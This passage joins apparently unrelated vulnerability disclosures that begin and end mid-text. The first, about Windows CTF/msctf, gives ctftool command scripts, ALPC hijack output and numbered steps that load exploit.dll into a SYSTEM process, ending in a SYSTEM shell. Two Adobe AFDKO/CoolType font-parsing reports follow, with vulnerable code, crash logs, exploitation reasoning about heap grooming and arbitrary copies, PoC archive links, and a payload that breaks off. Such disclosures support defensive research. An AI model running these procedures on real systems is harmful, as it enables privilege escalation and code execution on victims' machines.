full SYSTEM exploit for these issues, because I think it's interesting and I've already invested a ton of work to get the tool working to make a PoC :) I assume you'll want a copy when it's finished. Interfering with processes across sessions ------------------------------------------ To reproduce, follow these steps: * Login as an Administrator to Session 1. * Please make sure that you do not have an open copy of notepad. * Use Fast User Switching (i.e. Ctrl-Alt-Del, Switch User) to create an unprivileged standard user session. * Create a file containing these commands: connect Default 1 Sleep 10000 wait notepad.exe createstub 0 4 IID_ITfInputProcessorProfileMgr setarg 6 setarg 0x201 0x41414141 setarg 0x20001 0x41414142 setarg 0x1 ABABABAB-ABAB-ABAB-ABAB-ABABABABABAB setarg 0x1 BCBCBCBC-BCBC-BCBC-BCBC-BCBCBCBCBCBC setarg 0x10001 0x41414145 setarg 0x201 0x41414146 callstub 0 0 3 quit Run the following command: PS Z:\Home> cat .\script.txt | .\ctftool.exe * Use fast user switching to return to Session 1. * Run windbg -c g ‘notepad.exe’ * Wait 10 seconds, observe that notepad dereferences 0x41414141. This proves that an unprivileged user can interact with processes on a privileged session. UIPI can be bypassed, sending input events to higher integrity windows. ----------------------------------------------------------------------- Use the following command to make ctftool.exe Low Integrity: > icacls ctftool.exe /setintegritylevel low Observe that the tool can still connect, scan, and interact with Windows. The msctf client disables UIPI for Marshal event windows. --------------------------------------------------------- msctf!SYSTHREAD::LockThreadMessageWindow allows Marshal messages across integrity levels, I suspect this is a bug and unnecessary. The MSG_CALLSTUB command does not validate the command index. ------------------------------------------------------------- This is the (decompiled) code that handles MSG_CALLSTUB (Command 0xA, I just guessed the name): // Get pointer to appended Data ProxyInfo = MsgBase::GetProxyInfoPtr(*MessagePtr); if ( ProxyInfo ) { ms_exc.registration.TryLevel = 0; Systhread = this->Systhread; if ( Systhread->StubArray ) { FoundStub = 0; FindStub(Systhread->StubArray, ProxyInfo->StubId, &FoundStub); if ( FoundStub ) { if ( FoundStub->TimeStamp == ProxyInfo->TimeStamp ) Result = FoundStub->vtbl->invoke(FoundStub, ProxyInfo->FunctionIndex, MessagePtr); } } ms_exc.registration.TryLevel = -2; } return Result; Here, MessagePtr and ProxyInfo are entirely untrusted data, but that is then used to call an arbitrary index from a table, and the invoke method looks like this: int __thiscall CStubITfCompartment::Invoke(CStubITfCompartment *this, unsigned int FunctionIndex, struct MsgBase **Msg) { return (*(&CStubITfCompartment::_StubTbl + FunctionIndex))(this, Msg); } (All the Invoke functions look similar) Reproduce like this: PS Z:\Home> .\ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. ctf> connect The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1 ctf> scan Client 0, Tid 3976 (Flags 0x08, Hwnd 00000F88, Pid 4012, explorer.exe) Client 1, Tid 780 (Flags 0x08, Hwnd 0000030C, Pid 4012, explorer.exe) Client 2, Tid 692 (Flags 0x08, Hwnd 000002B4, Pid 4012, explorer.exe) Client 3, Tid 4420 (Flags 0x0c, Hwnd 00001144, Pid 4352, SearchUI.exe) Client 4, Tid 7964 (Flags 0x08, Hwnd 00001F1C, Pid 7920, conhost.exe) Client 5, Tid 7116 (Flags 0x08, Hwnd 00001BCC, Pid 7112, procexp.exe) Client 6, Tid 9616 (Flags 0000, Hwnd 00002590, Pid 2096, ctfmon.exe) Client 7, Tid 9048 (Flags 0x08, Hwnd 00002358, Pid 11660, windbg.exe) Client 8, Tid 1020 (Flags 0x08, Hwnd 000003FC, Pid 4652, notepad.exe) Client 9, Tid 11620 (Flags 0000, Hwnd 00002D64, Pid 3776, ctftool.exe) ctf> createstub 1020 4 IID_ITfInputProcessorProfileMgr Command succeeded, stub created Dumping Marshal Parameter 3 (Base 00CAA4B0, Type 0x106, Size 0x18, Offset 0x40) 000000: 4c e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c L..q(....*..[.C\ 000010: 01 00 00 00 33 01 61 12 ....3.a. Marshalled Value 3, COM {71C6E74C-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x12610133 ctf> setarg 6 New Parameter Chain, Length 6 ctf> setarg 0x201 0x41414141 Marshalled Value 0, INT 0000000041414141 ctf> setarg 0x201 0x41414146 Marshalled Value 1, INT 0000000041414146 ctf> setarg 0x201 0x41414146 Marshalled Value 2, INT 0000000041414146 ctf> setarg 0x201 0x41414146 Marshalled Value 3, INT 0000000041414146 ctf> setarg 0x201 0x41414146 Marshalled Value 4, INT 0000000041414146 ctf> setarg 0x201 0x41414146 Marshalled Value 5, INT 0000000041414146 ctf> callstub 0 0 0xffff Sending the Proxy data failed, 0x80004005 ctf> q There is no mutual authentication of clients and servers. ---------------------------------------------------------- To reproduce this issue, as an unprivileged session use the command `hijack` to create a new ALPC server, then create a privileged session. For example, `hijack Default 2`, to hijack the server for session 2 on the default desktop. When the new session is created, the tool will dump information as new privileged clients attempt to connect to the fake service. PS: Z:\Home> .\ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. ctf> hijack Default 1 NtAlpcCreatePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218 NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218 000000: 18 00 30 00 0a 20 00 00 00 11 00 00 44 11 00 00 ..0.. ......D... 000010: a4 86 00 00 b7 66 b8 00 00 11 00 00 44 11 00 00 .....f......D... 000020: e7 12 01 00 0c 00 00 00 80 01 02 00 20 10 d6 05 ............ ... A a message received ProcessID: 4352, SearchUI.exe ThreadId: 4420 WindowID: 00020180 NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218 000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. .......... 000010: ec 79 00 00 fa 66 b8 00 ac 0f 00 00 0c 03 00 00 .y...f.......... 000020: 12 04 01 00 08 00 00 00 10 01 01 00 00 00 00 00 ................ A a message received ProcessID: 4012, explorer.exe ThreadId: 780 WindowID: 00010110 NtAlpcSendWaitReceivePort("\BaseNamedObjects\msctf.serverDefault1") => 0 00000218 000000: 18 00 30 00 0a 20 00 00 ac 0f 00 00 0c 03 00 00 ..0.. .......... 000010: fc 8a 00 00 2a 67 b8 00 ac 0f 00 00 0c 03 00 00 ....*g.......... 000020: 12 04 01 00 08 00 00 00 10 01 01 00 58 00 00 00 ............X... A a message received ProcessID: 4012, explorer.exe ThreadId: 780 ... Notes on the tool ----------------- * I have only tested it on Windows 10. * The tool is interactive and uses readline, type help for a list of commands. * You can have the source if you like, please let me know. * The tool is unfinished, I plan to make a full working exploit but wanted to get the ball rolling on disclosure. The code has been tested with latest Win10 x64 as of 05/21, but I had to hardcode some offsets. In particular, I have msctf.dll 10.0.17763.348 and kernelbase.dll 10.0.17763.475 (I think those are the only two relevant modules). 1. As an unprivileged user, execute `query user` to see all the others users on the system. 2. Open ctfmonexploit.ctf in notepad, and set the connect line to the sessionid you want to compromise. 3. Copy the exploit payload dll into c:\Windows\Temp, call it exploit.dll. 4. Run `icacls c:\Windows\Temp\exploit.dll /grant "Everyone:(RX)"` 5. Run `cat ctfmonexploit.ctf | .\ctftool.exe` 6. The dll is loaded into a High Integrity process of the specified session when the session is next active. I got this attack working from unprivileged user to SYSTEM, even from LPAC. The trick is to switch to the WinLogon desktop, which an unprivileged user can do using USER32!LockWorkstation(). PS Z:\Home\Documents\Projects\alpc> .\ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> connect Winlogon 1 The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon1 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverWinlogon1") => 0xc0000034 Waiting for the specified port to appear... NtAlpcConnectPort("\BaseNamedObjects\msctf.serverWinlogon1") => 0 Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon1, Handle 00000224 ctf> scan Client 0, Tid 6324 (Flags 0000, Hwnd 000018B4, Pid 4020, ctftool.exe) Client 1, Tid 4656 (Flags 0x1000000c, Hwnd 00001230, Pid 2336, LogonUI.exe) Client 2, Tid 8692 (Flags 0x1000000c, Hwnd 000021F4, Pid 2336, LogonUI.exe) Client 3, Tid 4808 (Flags 0x10000008, Hwnd 000012C8, Pid 4440, TabTip.exe) Client 4, Tid 8800 (Flags 0x1000000c, Hwnd 00002260, Pid 8536, Utilman.exe) Client 5, Tid 6788 (Flags 0x10000008, Hwnd 00001A84, Pid 6628, osk.exe) I finished the exploit, it reliably gets NT AUTHORITY\SYSTEM from an unprivileged user on up-to-date Windows 10 1903. I sent Microsoft a finished version. Here is the current source code, and a video demonstrating it. I think the best targets are either logonui.exe or consent.exe, both run as SYSTEM. https://www.youtube.com/watch?v=JUbac3OLPaM $ ./ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> script .\scripts\ctf-consent-system.ctf Attempting to copy exploit payload... 1 file(s) copied. Right click something and select "Run as Administrator", then wait for a SYSTEM shell... !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!! YOU DONT NEED TO KNOW ANY PASSWORD, JUST WAIT! !!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1 Connected to CTF server@\BaseNamedObjects\msctf.serverDefault1, Handle 00000244 Waiting for the consent dialog to join the session... Found new client consent.exe, DefaultThread now 6900 consent.exe has joined the session, starting exploit... Command succeeded, stub created Dumping Marshal Parameter 3 (Base 011E89C0, Type 0x106, Size 0x18, Offset 0x40) 000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C\ 000010: 01 00 00 00 6c 4a af 03 ....lJ.. Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x3af4a6c 0x7ff8cf290000 0x7ff8cf340000 0x7ff8cffe0000 0x7ff8cf340000 Guessed kernel32 => C:\WINDOWS\system32\kernel32.DLL C:\WINDOWS\system32\kernel32.DLL is a 64bit module. kernel32!LoadLibraryA@0x180000000+0x1eb60 The CFG call chain is built, writing in parameters... Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"... 0x7ff8cfc40000 Payload created and call chain ready, get ready... C:\WINDOWS\system32>whoami nt authority\system If you have an input profile with enhanced capabilities available (in general, if you use an IME then you do - Chinese, Korean, Japanese, etc.), then a low privileged application on the same session can read and write data to a higher privileged application. The user doesn't need to have the language selected, because a CTF client can change active profile too, but it does have to be installed. The problem with this is that a low privileged application can take control of an elevated command prompt, escape a low-integrity sandbox, escape AppContainer/LPAC, read passwords out of login dialogs/consent dialogs, and so on. This means UIPI basically doesn't work any more. I've attached a ctf script that will wait for you to open notepad, and then write some text into it. Here is a screenshot of a low privileged ctftool typing into an Administrator console. Please note, if you *only* have languages installed that doesn't use an Out-of-process TIP (English, German, French, Polish, etc), you are likely unaffected (or at least, I don't know how to exploit it yet). Right now, it's mostly users in Asia affected by this, but I'm admittedly ignorant about i18n and a11y. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47258.zip

-----=====[ Background ]=====----- AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree. We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such as Adobe Acrobat. Within a single installation of Acrobat, we have found traces of AFDKO in four different libraries: acrodistdll.dll, Acrobat.dll, CoolType.dll and AdobePDFL.dll. According to our brief analysis, AFDKO is not used for font rasterization (there is a different engine for that), but rather for the conversion between font formats. For example, it is possible to execute the AFDKO copy in CoolType.dll by opening a PDF file with an embedded font, and exporting it to a PostScript (.ps) or Encapsulated PostScript (.eps) document. It is uncertain if the AFDKO copies in other libraries are reachable as an attack surface and how. It is also interesting to note that the AFDKO copies in the above DLLs are much older than the latest version of the code on GitHub. This can be easily recognized thanks to the fact that each component of the library (e.g. the Type 1 Reader - t1r, Type 1 Writer - t1w, CFF reader - cfr etc.) has its own version number included in the source code, and they change over time. For example, CoolType's version of the "cfr" module is 2.0.44, whereas the first open-sourced commit of AFDKO from September 2014 has version 2.0.46 (currently 2.1.0), so we can conclude that the CoolType fork is at least about ~5 years old. Furthermore, the forks in Acrobat.dll and AdobePDFL.dll are even older, with a "cfr" version of 2.0.31. Despite the fact that CoolType contains an old fork of the library, it includes multiple non-public fixes for various vulnerabilities, particularly a number of important bounds checks in read*() functions declared in cffread/cffread.c (e.g. readFDSelect, readCharset etc.). These checks were first introduced in CoolType.dll shipped with Adobe Reader 9.1.2, which was released on 28 May 2009. This means that the internal fork of the code has had many bugs fixed for the last 10 years, which are still not addressed in the open-source branch of the code. Nevertheless, we found more security vulnerabilities which affect the AFDKO used by CoolType, through analysis of the publicly available code. This report describes one such issue reachable through the Adobe Acrobat file export functionality. -----=====[ Description ]=====----- The Type 1 font parsing code in AFDKO resides in c/public/lib/source/t1read/t1read.c, and the main context structure is t1rCtx, also declared in that file. t1rCtx contains a dynamic array FDArray of FDInfo structures: --- cut --- 70 typedef struct /* FDArray element */ 71 { 72 abfFontDict *fdict; /* Font dict */ 73 struct /* Subrs */ 74 { 75 ctlRegion region; /* cstr data region */ 76 dnaDCL(long, offset); 77 } subrs; 78 t1cAuxData aux; /* Auxiliary charstring data */ 79 struct /* Dict key info */ 80 { 81 long lenIV; /* Length random cipher bytes */ 82 long SubrMapOffset; /* CID-specific key */ 83 unsigned short SubrCount; /* CID-specific key */ 84 unsigned short SDBytes; /* CID-specific key */ 85 unsigned short BlueValues; /* Flags /BlueValues seen */ 86 } key; 87 t1cDecryptFunc decrypt; /* Charstring decryption function */ 88 } FDInfo; 89 [...] 110 dnaDCL(FDInfo, FDArray); /* FDArray */ --- cut --- The array is initially set to 1 element at the beginning of t1rBegFont(): --- cut --- 3035 /* Parse PostScript font. */ 3036 int t1rBegFont(t1rCtx h, long flags, long origin, abfTopDict **top, float *UDV) { [...] 3045 dnaSET_CNT(h->FDArray, 1); --- cut --- Later on, the array can be resized to any number of elements in the range of 0-256 using the /FDArray operator, which is handled by the initFDArray() function: --- cut --- 2041 /* Initialize FDArray. */ 2042 static void initFDArray(t1rCtx h, long cnt) { 2043 int i; 2044 if (cnt < 0 || cnt > 256) 2045 badKeyValue(h, kFDArray); 2046 dnaSET_CNT(h->FDArray, cnt); 2047 dnaSET_CNT(h->fdicts, cnt); 2048 for (i = 0; i < h->FDArray.cnt; i++) 2049 initFDInfo(h, i); 2050 h->fd = &h->FDArray.array[0]; 2051 } 2052 [...] 2318 case kFDArray: 2319 initFDArray(h, parseInt(h, kFDArray)); 2320 break; --- cut --- Parts of the FDInfo structures (specifically the "aux" nested structure) are initialized later on, in prepClientData(): --- cut --- 2949 /* Prepare auxiliary data */ 2950 for (i = 0; i < h->FDArray.cnt; i++) { 2951 FDInfo *fd = &h->FDArray.array[i]; 2952 fd->aux.flags = 0; 2953 if (h->flags & T1R_UPDATE_OPS) 2954 fd->aux.flags |= T1C_UPDATE_OPS; 2955 fd->aux.src = h->stm.tmp; 2956 fd->aux.subrs.cnt = fd->subrs.offset.cnt; 2957 fd->aux.subrs.offset = fd->subrs.offset.array; 2958 fd->aux.subrsEnd = fd->subrs.region.end; 2959 fd->aux.stm = &h->cb.stm; [...] --- cut --- The problem with the code is that it assumes that FDArray always contains at least 1 element, whereas initFDArray() allows us to truncate it to 0 items. When the client program later calls t1rIterateGlyphs(), execution will reach the following code in readGlyph(): --- cut --- 3170 /* Read charstring. */ 3171 static void readGlyph(t1rCtx h, 3172 unsigned short tag, abfGlyphCallbacks *glyph_cb) { 3173 int result; 3174 long offset; 3175 long flags = h->flags; 3176 Char *chr = &h->chars.index.array[tag]; 3177 t1cAuxData *aux = &h->FDArray.array[chr->iFD].aux; 3178 [...] --- cut --- The chr->iFD values are initialized to 0 by default in abfInitGlyphInfo(), so in line 3177 the library will take a reference to the uninitialized structure under h->FDArray.array[0].aux: --- cut --- Breakpoint 1, readGlyph (h=0x61f000000080, tag=0, glyph_cb=0x62c0000078d8) at ../../../../../source/t1read/t1read.c:3179 3179 if ((flags & CID_FONT) && !(flags & PRINT_STREAM)) { (gdb) print *aux $1 = {flags = -4702111234474983746, src = 0xbebebebebebebebe, stm = 0xbebebebebebebebe, subrs = {cnt = -4702111234474983746, offset = 0xbebebebebebebebe}, subrsEnd = -4702111234474983746, ctx = 0xbebebebebebebebe, getStdEncGlyphOffset = 0xbebebebebebebebe, bchar = 190 '\276', achar = 190 '\276', matrix = { -0.372548997, -0.372548997, -0.372548997, -0.372548997, -0.372548997, -0.372548997}, nMasters = -16706, UDV = {-0.372548997 <repeats 15 times>}, NDV = { -0.372548997 <repeats 15 times>}, WV = {-0.372548997 <repeats 64 times>}} --- cut --- In the above listing, 0xbe are AddressSanitizer's marker bytes for unitialized heap memory (in a Linux x64 build of the "tx" tool used for testing). The "aux" pointer is further passed down to functions in t1cstr/t1cstr.c -- first to t1cParse(), then to t1DecodeSubr(), and then to srcSeek(), where the following call is performed: --- cut --- 191 /* Seek to offset on source stream. */ 192 static int srcSeek(t1cCtx h, long offset) { 193 if (h->aux->stm->seek(h->aux->stm, h->aux->src, offset)) 194 return 1; 195 h->src.offset = offset; 196 return 0; 197 } --- cut --- As we remember, the contents of the "aux" object and specifically aux.stm are uninitialized, so the code attempts to load a function pointer from an undefined address. According to our tests, the memory allocator used in Adobe Acrobat boils down to a simple malloc() call without a subsequent memset(), so the undefined data could in fact be leftover bytes from an older allocation freed before the faulty font is loaded. As a result, the "stm" pointer could be controlled by the input file through some light heap spraying/grooming, such that the free memory chunks reused by malloc() contain the desired data. This, in turn, could potentially lead to arbitrary code execution in the context of the Acrobat process. -----=====[ Proof of Concept ]=====----- The proof of concept is a PDF file with an embedded Type 1 font, which includes an extra "/FDArray 0" operator to set the length of FDArray to 0, as described above. -----=====[ Crash logs ]=====----- For reliable reproduction, we have enabled the PageHeap for Acrobat.exe in Application Verifier. In addition to allocating memory on page boundaries, it also fills out newly returned memory with a 0xc0 value, resulting in more consistent crashes when using such uninitialized data. When the poc.pdf file is opened with Adobe Acrobat Pro and converted to a PostScript document via "File > Export To > (Encapsulated) PostScript", the following crash occurs in Acrobat.exe: --- cut --- (2728.221c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=84ca7ef4 ebx=87edee2c ecx=c0c0c0c0 edx=00000000 esi=012f9a2c edi=00000021 eip=548d0e67 esp=012f99e0 ebp=012f99f4 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 CoolType!CTGetVersion+0xafccf: 548d0e67 ff510c call dword ptr [ecx+0Ch] ds:002b:c0c0c0cc=???????? 0:000> k # ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 00 012f99f4 548d1091 CoolType!CTGetVersion+0xafccf 01 012f9a1c 548d1b6e CoolType!CTGetVersion+0xafef9 02 012f9ea0 548d545e CoolType!CTGetVersion+0xb09d6 03 012f9ed0 548d63b1 CoolType!CTGetVersion+0xb42c6 04 012f9eec 548a6164 CoolType!CTGetVersion+0xb5219 05 012f9f14 548a3919 CoolType!CTGetVersion+0x84fcc 06 012f9f34 5486bd5c CoolType!CTGetVersion+0x82781 07 012f9f70 54842786 CoolType!CTGetVersion+0x4abc4 08 012fa224 548ec8bd CoolType!CTGetVersion+0x215ee 09 012fb768 548ed5de CoolType!CTGetVersion+0xcb725 0a 012fc830 548243e6 CoolType!CTGetVersion+0xcc446 0b 012fc92c 54823fda CoolType!CTGetVersion+0x324e 0c 012fc940 54904037 CoolType!CTGetVersion+0x2e42 0d 012fc980 0c146986 CoolType!CTGetVersion+0xe2e9f 0e 012fc9f4 0c16008f AGM!AGMGetVersion+0x23eb86 0f 012fca40 0c16039c AGM!AGMGetVersion+0x25828f 10 012fca6c 0c1603fd AGM!AGMGetVersion+0x25859c 11 012fcaac 0c129704 AGM!AGMGetVersion+0x2585fd 12 012fcd48 62c11f7a AGM!AGMGetVersion+0x221904 13 012fcd88 62c1fde1 BIB!BIBInitialize4+0x7ff 14 012fcd90 62c11ee1 BIB!BIBLockSmithUnlockImpl+0x48c9 15 00000000 00000000 BIB!BIBInitialize4+0x766 --- cut --- The value of ECX is loaded from EAX: --- cut --- 0:000> u @$scopeip-7 CoolType!CTGetVersion+0xafcc8: 548d0e60 8b4808 mov ecx,dword ptr [eax+8] 548d0e63 ff7004 push dword ptr [eax+4] 548d0e66 51 push ecx 548d0e67 ff510c call dword ptr [ecx+0Ch] 548d0e6a 83c40c add esp,0Ch 548d0e6d 85c0 test eax,eax 548d0e6f 7405 je CoolType!CTGetVersion+0xafcde (548d0e76) 548d0e71 33c0 xor eax,eax --- cut --- And it is clear that almost none of the memory under [EAX] is initialized at the time of the crash: --- cut --- 0:000> dd eax 84ca7ef4 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 84ca7f04 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c00000 84ca7f14 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 84ca7f24 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 84ca7f34 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 84ca7f44 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 84ca7f54 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 84ca7f64 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0 --- cut --- -----=====[ References ]=====----- [1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/ [2] https://github.com/adobe-type-tools/afdko Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47260.zip

-----=====[ Background ]=====----- AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree. We have recently discovered that parts of AFDKO are compiled in in Adobe's desktop software such as Adobe Acrobat. Within a single installation of Acrobat, we have found traces of AFDKO in four different libraries: acrodistdll.dll, Acrobat.dll, CoolType.dll and AdobePDFL.dll. According to our brief analysis, AFDKO is not used for font rasterization (there is a different engine for that), but rather for the conversion between font formats. For example, it is possible to execute the AFDKO copy in CoolType.dll by opening a PDF file with an embedded font, and exporting it to a PostScript (.ps) or Encapsulated PostScript (.eps) document. It is uncertain if the AFDKO copies in other libraries are reachable as an attack surface and how. It is also interesting to note that the AFDKO copies in the above DLLs are much older than the latest version of the code on GitHub. This can be easily recognized thanks to the fact that each component of the library (e.g. the Type 1 Reader - t1r, Type 1 Writer - t1w, CFF reader - cfr etc.) has its own version number included in the source code, and they change over time. For example, CoolType's version of the "cfr" module is 2.0.44, whereas the first open-sourced commit of AFDKO from September 2014 has version 2.0.46 (currently 2.1.0), so we can conclude that the CoolType fork is at least about ~5 years old. Furthermore, the forks in Acrobat.dll and AdobePDFL.dll are even older, with a "cfr" version of 2.0.31. Despite the fact that CoolType contains an old fork of the library, it includes multiple non-public fixes for various vulnerabilities, particularly a number of important bounds checks in read*() functions declared in cffread/cffread.c (e.g. readFDSelect, readCharset etc.). These checks were first introduced in CoolType.dll shipped with Adobe Reader 9.1.2, which was released on 28 May 2009. This means that the internal fork of the code has had many bugs fixed for the last 10 years, which are still not addressed in the open-source branch of the code. Nevertheless, we found more security vulnerabilities which affect the AFDKO used by CoolType, through analysis of the publicly available code. This report describes one such issue reachable through the Adobe Acrobat file export functionality. -----=====[ Description ]=====----- The "Type 2 Charstring Format" specification from 5 May 1998 introduced two storage operators: store and load, which were both deprecated in the next iteration of the specs in 2000. These operators were responsible for copying data between the transient array (also known as the BuildCharArray, or BCA) and the so-called "Registry object". As the document stated: """ The Registry provides more permanent storage for a number of items that have predefined meanings. The items stored in the Registry do not persist beyond the scope of rendering a font. Registry items are selected with an index, thus: 0 Weight Vector 1 Normalized Design Vector 2 User Design Vector The result of selecting a Registry item with an index outside this list is undefined. """ The Type 1 CharString interpreter implemented in t1Decode() (c/public/lib/source/t1cstr/t1cstr.c) supports the load and store operators: --- cut --- 1450 case t1_store: 1451 result = do_store(h); 1452 if (result) 1453 return result; 1454 continue; [...] 1470 case t1_load: 1471 result = do_load(h); 1472 if (result) 1473 return result; 1474 continue; --- cut --- The do_store() and do_load() functions are as follows: --- cut --- 664 /* Select registry item. Return NULL on invalid selector. */ 665 static float *selRegItem(t1cCtx h, int reg, int *size) { 666 switch (reg) { 667 case T1_REG_WV: 668 *size = T1_MAX_MASTERS; 669 return h->aux->WV; 670 case T1_REG_NDV: 671 *size = T1_MAX_AXES; 672 return h->aux->NDV; 673 case T1_REG_UDV: 674 *size = T1_MAX_AXES; 675 return h->aux->UDV; 676 } 677 return NULL; 678 } 679 680 /* Execute "store" op. Return 0 on success else error code. */ 681 static int do_store(t1cCtx h) { 682 int size; 683 int count; 684 int i; 685 int j; 686 int reg; 687 float *array; 688 689 CHKUFLOW(4); 690 691 count = (int)POP(); 692 i = (int)POP(); 693 j = (int)POP(); 694 reg = (int)POP(); 695 array = selRegItem(h, reg, &size); 696 697 if (array == NULL || 698 i < 0 || i + count + 1 >= TX_BCA_LENGTH || 699 j < 0 || j + count + 1 >= size) 700 return t1cErrStoreBounds; 701 702 memcpy(&array[j], &h->BCA[i], sizeof(float) * count); 703 return 0; 704 } 705 [...] 736 737 /* Execute "load" op. Return 0 on success else error code. */ 738 static int do_load(t1cCtx h) { 739 int size; 740 int count; 741 int i; 742 int reg; 743 float *array; 744 745 CHKUFLOW(3); 746 747 count = (int)POP(); 748 i = (int)POP(); 749 reg = (int)POP(); 750 array = selRegItem(h, reg, &size); 751 752 if (i < 0 || i + count - 1 >= TX_BCA_LENGTH || count > size) 753 return t1cErrLoadBounds; 754 755 memcpy(&h->BCA[i], array, sizeof(float) * count); 756 757 return 0; 758 } --- cut --- While both routines try to enforce proper bounds of the indexes and lengths (lines 697-700 and 752-753), they miss one important corner case -- negative count. When a value smaller than 0 is specified for "count", many of the other sanity checks can be bypassed, and out-of-bounds read/write access can be triggered with a high degree of control over what is copied where. The condition is especially dangerous in x86 builds, where a controlled 32-bit index added to a memory pointer can address the entire process address space. At the time of this writing, Adobe Acrobat for Windows is available as a 32-bit build only. To give an example, setting count to a value in the range of 0x80000000-0xbfffffff makes it possible to set the "sizeof(float) * count" expression evaluate to an arbitrary multiple of 4 (0, 4, 8, ..., 0xfffffff8), enabling us to copy any chosen number of bytes in lines 702 and 755. At the same time, the value is so small that it bypasses all checks where "i + count" and "j + count" are involved for i, j in the range of 0-0x3fffffff, which also enables us to refer to the entire address space relative to the referenced buffer. To summarize, we can copy an arbitrary number of bytes between h->BCA[] and the registry arrays at arbitrary offsets, which is a powerful primitive. There is only one obstacle -- the fact that values on the interpreter stack are stored as 32-bit floats, which means they have a 23-bit mantissa. For this reason, it is impossible to precisely control the integer values of i, j and count, if they are in the order of 2^30 or 2^31. The granularity is 128 for numbers around 2^30 and 256 for numbers around 2^31, so for example it is impossible to set i to 0x3fffffff or count to 0x80000001; the closest values are 0x3fffff80/0x40000000 and 0x80000000/0x80000100, respectively. In practice, this means that we can only copy out-of-bounds memory in chunks of 512 bytes (4 * 128) or 1024 under specific conditions, and that we can only choose negative offsets relative to BCA/array which are divisible by 128. On the other hand, if we set count to a largely negative value (e.g. -1073741696), we can set i and j to fully controlled (small) positive numbers. The h->BCA[] array is stored within the t1cCtx structure in the stack frame of the t1cParse() function. The registry arrays reside within t1cAuxData structures allocated on the heap. As a result, the vulnerability gives us out-of-bounds access to both the stack and heap. An attacker could target generic data in memory related to the control flow such as return addresses, or application-specific data inside t1cCtx/t1cAuxData, which also contain many sensitive fields such as function pointers etc. As a side note, the do_load() routine doesn't verify that array != NULL, which may result in a) operating on an uninitialized "size" variable in line 752, and b) passing NULL as the source parameter to memcpy() in line 755. -----=====[ Invalid memcpy_s usage ]=====----- We also wanted to point out another interesting bug in AFDKO, which is not present in the GitHub repository but can be found in CoolType. The latter build of the code uses safe variants of many standard functions, such as memcpy_s() instead of memcpy(), vsprintf_s() instead of vsprintf() etc. The memcpy() call in do_store() was also converted to memcpy_s(), and currently looks like this in decompiled form: --- cut --- memcpy_s(&array[j], 4 - 4 * j, (char *)h + 4 * i + 916, 4 * count); --- cut --- which can be translated to: --- cut --- memcpy_s(&array[j], sizeof(array) - sizeof(float) * j, &h->BCA[i], sizeof(float) * count); --- cut --- Note the second argument, which is supposed to be the length of the buffer being copied to. Judging by the code the author meant to set it to the number of available bytes from element "j" to the end of the array, but used the sizeof(array) expression instead of the actual length stored in the "size" variable. In this case sizeof(array) is the size of a pointer and evaluates to 4 or 8, which is nowhere near the actual size of the array (16 or 64 depending on the register). Consequently, this bug effectively blocks access to the element at array[1] for j={0, 1}, and is incorrectly set to a huge unsigned value for j >= 2, rendering it ineffective. Considering that the 2nd "destsz" memcpy_s argument is not supposed to be a security boundary but just a safety net, and proper sanitization of the i, j, count values should prevent any kind of out-of-bounds access, we don't consider this a separate vulnerability. We are reporting it here as FYI. -----=====[ Proof of Concept ]=====----- The proof of concept is a PDF file with an embedded Type 1 font, which includes the following payload in the CharString of the "A" character: --- cut --- 1 1621139584 134217728 